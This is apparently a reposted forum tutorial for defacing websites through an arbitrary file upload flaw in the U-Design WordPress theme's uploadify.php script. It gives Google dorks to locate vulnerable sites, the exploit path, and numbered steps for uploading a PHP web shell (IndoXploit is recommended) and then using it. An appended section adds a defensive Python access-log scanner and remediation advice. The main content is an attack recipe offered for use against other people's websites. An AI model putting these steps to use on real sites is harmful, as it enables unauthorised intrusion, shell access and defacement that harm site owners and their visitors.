Deface Website WordPress Theme U-Design Arbitrary File Upload Vulnerability



===================================================================
== Dork : inurl:/wp-content/themes/u-design/                                                            ==
==            inurl:/wp-content/themes/u-design/options/                                               ==
==            inurl:/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php ==
== Exploit : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php      ==             
== CSRF : Here (online), by Drach Levia                                                              ==
== Shell : Find one yourself on Google :v (IndoXploit shell recommended)              ==
===================================================================

Proof Of Concept :

1. Search using the dorks above !!! Study them and develop them further -_- !!!

2. Once you have found a site, append the exploit path. Example: www.bechy.com/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

3. This is the step that decides whether it works :v. If the page is blank, the site is vulnerable (you are lucky); if it is not blank, or it returns Not Found / Error 404, look for another target. Don't give up :v keep your spirits up.

4. Enter your target URL into the online CSRF tool mentioned above, choose Filedata as the Post Name, click next, then upload the shell with Submit.

5. If the site is vulnerable and the upload succeeded, the response shows the number "1" (without the quotes). If it did not succeed, look for another one :V Keep your spirits up. Don't give up.

6. Then access the uploaded shell at www.bechy.com/shellku.php

7. Done. Feel free to mess around with it.
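
Seen from the defending side, the steps above leave a recognisable trail in the web server access log: a request to uploadify.php, a successful POST to it, then a request by the same client for a PHP file that was never served before. The Python sketch below is an added example, not part of the original post; it assumes common/combined log format, and the log lines, IP addresses and the file name example-upload.php are constructed.

```python
import re

# Script path as given on the page; matched case-insensitively under any prefix.
UPLOADIFY = re.compile(
    r"/wp-content/themes/u-design/scripts/admin/uploadify/uploadify\.php$", re.I)
# Common/combined log format (assumed): client, method, target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def scan(lines):
    """Return (probes, uploads, followups) found in access-log lines."""
    probes, uploads, followups = [], [], []
    seen_php = set()    # PHP paths already requested by anyone
    uploaders = set()   # clients whose POST to uploadify.php returned 2xx
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue    # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        if UPLOADIFY.search(path):
            if method == "POST" and status.startswith("2"):
                uploads.append((ip, path))
                uploaders.add(ip)
            else:
                probes.append((ip, path, status))
            continue
        if path.lower().endswith(".php"):
            # A PHP file first seen only after this client's upload is suspect.
            if ip in uploaders and path not in seen_php and status.startswith("2"):
                followups.append((ip, path))
            seen_php.add(path)
    return probes, uploads, followups

U = "/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php"
# Constructed sample log (documentation IP ranges, made-up file name).
SAMPLE = [
    '198.51.100.7 - - [10/Oct/2023:13:55:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Oct/2023:14:02:11 +0000] "GET %s HTTP/1.1" 200 0' % U,
    '192.0.2.44 - - [10/Oct/2023:14:02:40 +0000] "POST %s HTTP/1.1" 200 1' % U,
    '192.0.2.44 - - [10/Oct/2023:14:03:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Oct/2023:14:03:05 +0000] "GET /example-upload.php HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for name, hits in zip(("probe", "upload", "follow-up"), scan(SAMPLE)):
        for hit in hits:
            print(name, *hit)
```

Any hit on the script on a site that runs this theme warrants checking the web root for PHP files created around the same time, and blocking or removing the script at the web server.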


Thanks to: sasrgrup
Repost : Mr.Bechy
